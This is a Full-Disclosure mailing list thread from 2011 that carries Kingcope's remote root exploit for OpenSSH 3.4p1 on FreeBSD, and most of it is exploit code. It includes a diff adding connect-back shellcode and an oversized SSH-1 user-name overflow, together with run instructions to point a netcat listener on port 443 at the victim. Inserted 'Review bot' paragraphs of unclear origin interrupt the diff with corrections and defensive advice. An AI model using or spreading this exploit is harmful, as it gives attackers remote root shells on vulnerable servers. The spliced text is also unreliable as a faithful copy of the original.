Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)

From: HI-TECH . <isowarez.isowarez.isowarez@googlemail.com>
To: Benji <me@b3nji.com>
Cc: full-disclosure@lists.grok.org.uk,bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
Date:


you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji <me@b3nji.com>:
> So you want people to download your statically linked binary?
>
> On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
> <isowarez.isowarez.isowarez@googlemail.com> wrote:
>>
>> OpenSSH FreeBSD Remote Root Exploit
>> By Kingcope
>> Year 2011
>>
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
>> run like ./ssh -1 -z <yourip> <target>
>> set up a netcat, port 443 on yourip first
>>
>> a statically linked Linux binary of the exploit can be found below
>> attached is a diff to openssh-5.8p2.
>>
>> the statically linked binary can be downloaded from
>> http://isowarez.de/ssh_0day
>>
>> I know these versions are really old, some seem to run
>> that though.
>>
>> -Cheers, King "the archaeologist" Cope
>>
>> diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
>> 149a150
>> > char *myip;
>> 195a197,203
>> > "OpenSSH FreeBSD Remote Root Exploit\n"
>> > "By Kingcope\n"
>> > "Year 2011\n\n"
>> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
>> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
>> > "run like ./ssh -1 -z <yourip> <target>\n"
>> > "setup a netcat, port 443 on yourip first\n\n"
>> 299c307
>> <    while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
>> ---
>> >    while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
>> 335a344,346
>> >            break;
>> >        case 'z':
>> >            myip = optarg;
>> diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
>> 667a668,719
>> > //IP=\xc0\xa8\x20\x80
>> > #define    IPADDR "\xc0\xa8\x20\x80"
>> > #define PORT "\x27\x10"       /* htons(10000) */
>> >
>> > char sc[] =
>> >  "\x90\x90"
>> >  "\x90\x90"
>> >  "\x31\xc9"         // xor  ecx, ecx
>> >  "\xf7\xe1"         // mul  ecx
>> >  "\x51"           // push  ecx
>> >  "\x41"           // inc  ecx
>> >  "\x51"           // push  ecx
>> >  "\x41"           // inc  ecx
>> >  "\x51"           // push  ecx
>> >  "\x51"           // push  ecx
>> >  "\xb0\x61"         // mov  al, 97
>> >  "\xcd\x80"         // int  80h
>> >  "\x89\xc3"         // mov  ebx, eax
>> >  "\x68"IPADDR            // push  dword 0101017fh
>> >  "\x66\x68"PORT       // push  word 4135
>> >  "\x66\x51"         // push  cx
>> >  "\x89\xe6"         // mov  esi, esp
>> >  "\xb2\x10"         // mov  dl, 16
>> >  "\x52"           // push  edx
>> >  "\x56"           // push  esi
>> >  "\x50"           // push  eax
>> >  "\x50"           // push  eax
>> >  "\xb0\x62"         // mov  al, 98
>> >  "\xcd\x80"         // int  80h
>> >  "\x41"           // inc  ecx
>> >  "\xb0\x5a"         // mov  al, 90
>> >  "\x49"           // dec  ecx
>> >  "\x51"           // push  ecx
>> >  "\x53"           // push  ebx
>> >  "\x53"           // push  ebx
>> >  "\xcd\x80"         // int  80h
>> >  "\x41"           // inc  ecx
>> >  "\xe2\xf5"         // loop  -10
>> >  "\x51"           // push  ecx
>> >  "\x68\x2f\x2f\x73\x68"   // push  dword 68732f2fh
>> >  "\x68\x2f\x62\x69\x6e"   // push  dword 6e69622fh
>> >  "\x89\xe3"         // mov  ebx, esp
>> >  "\x51"           // push  ecx
>> >  "\x54"           // push  esp
>> >  "\x53"           // push  ebx
>> >  "\x53"           // push  ebx
>> >  "\xb0\xc4\x34\xff"
>> >  "\xcd\x80";        // int  80h
>> >
>> >
>> > extern char *myip;
>> >
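Review bot: the comments on the two parameterised pushes in this hunk do not match the bytes they annotate: `"\x68"IPADDR` is commented `push dword 0101017fh` although IPADDR is defined as `\xc0\xa8\x20\x80`, and `"\x66\x68"PORT` is commented `push word 4135` although the PORT macro's own comment says `htons(10000)`; the final `"\xb0\xc4\x34\xff"` line carries no comment at all, unlike every other instruction, so the annotations should be brought into line with the bytes or dropped. Both macros are only placeholders: the later sshconnect1.c hunk overwrites them at run time (at sc+21 and sc+27) with the address supplied through `-z` and port 443, so from a defender's side the observable artifact of this payload is an outbound connection from the sshd host to that address on port 443, which is exactly the egress an sshd process should never initiate.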
>> 678a731,748
>> >
>> >    char buffer[100000];
>> >
>> >    printf("OpenSSH Remote Root Exploit\n");
>> >    printf("By Kingcope\n");
>> >    printf("Year 2011\n\n");
>> >    printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
>> >    printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
>> >    printf("Connect back to: %s:443\n", myip);
>> >
>> >    *((unsigned long*)(sc + 21)) = inet_addr(myip);
>> >    *((unsigned short*)(sc + 27)) = htons(443);
>> >
>> >    memset(buffer, 'V', 8096);
>> >    memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); //
>> > SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> >    memset(buffer+28, '\x90', 65535);
>> >    memcpy(buffer+28+65535, sc, sizeof(sc));
>> >    server_user=buffer;
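Review bot: the comment on the `memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4);` line has been wrapped by the mailer, so its second half (`SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702`) sits on its own `>` line outside the `//` comment; as quoted, this hunk is not a clean patch, so the earlier statement that the diff can simply be applied does not hold for this copy. The same line hardcodes one 4-byte value that the comment ties to the 20020702 build only, while the banner printed just above (and again in the ssh.c hunk) claims both 20020702 and 20030924 are covered; either the banner or the comment should be corrected so they agree. Note also what the hunk actually delivers: `buffer` is a 100000-byte automatic array, its first 8096 bytes are set to 'V', 65535 bytes of 0x90 follow from offset 28 with the payload after them, and the whole array is handed to the protocol-1 client as `server_user`, so the vector is the SSH-1 user name. A protocol-1 login attempt carrying a user name tens of kilobytes long is the thing to look for on the wire, and disabling protocol 1 on the server (`Protocol 2` in sshd_config) removes this path entirely.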
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>